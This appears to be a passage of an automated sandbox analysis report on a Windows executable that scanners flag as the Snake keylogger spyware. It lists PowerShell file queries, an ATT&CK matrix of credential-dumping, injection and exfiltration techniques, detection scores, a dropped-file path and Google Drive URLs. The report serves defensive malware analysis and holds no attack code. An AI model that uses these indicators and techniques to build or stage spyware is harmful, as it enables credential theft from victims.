      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00405DC3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405DC3
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      311
      Process Injection
      11
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      Logon Script (Windows)Logon Script (Windows)311
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets3
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      yMXFgPOdf2.exe74%ReversingLabsWin32.Spyware.Snakekeylogger
      yMXFgPOdf2.exe67%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe74%ReversingLabsWin32.Spyware.Snakekeylogger
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.181.238
      truefalse
        high
        drive.usercontent.google.com
        142.250.185.225
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://drive.usercontent.google.com/Hsmsiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2793918329.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://aka.ms/pscore6lBeqpowershell.exe, 00000002.00000002.2633960829.0000000005011000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.usercontent.google.com/msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.google.com/rLwmsiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://nsis.sf.net/NSIS_ErrorErroryMXFgPOdf2.exe, yMXFgPOdf2.exe.2.drfalse
                                    high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.usercontent.google.com/usmsiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2793918329.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.com/~~msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.commsiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.usercontent.google.com/Omsiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
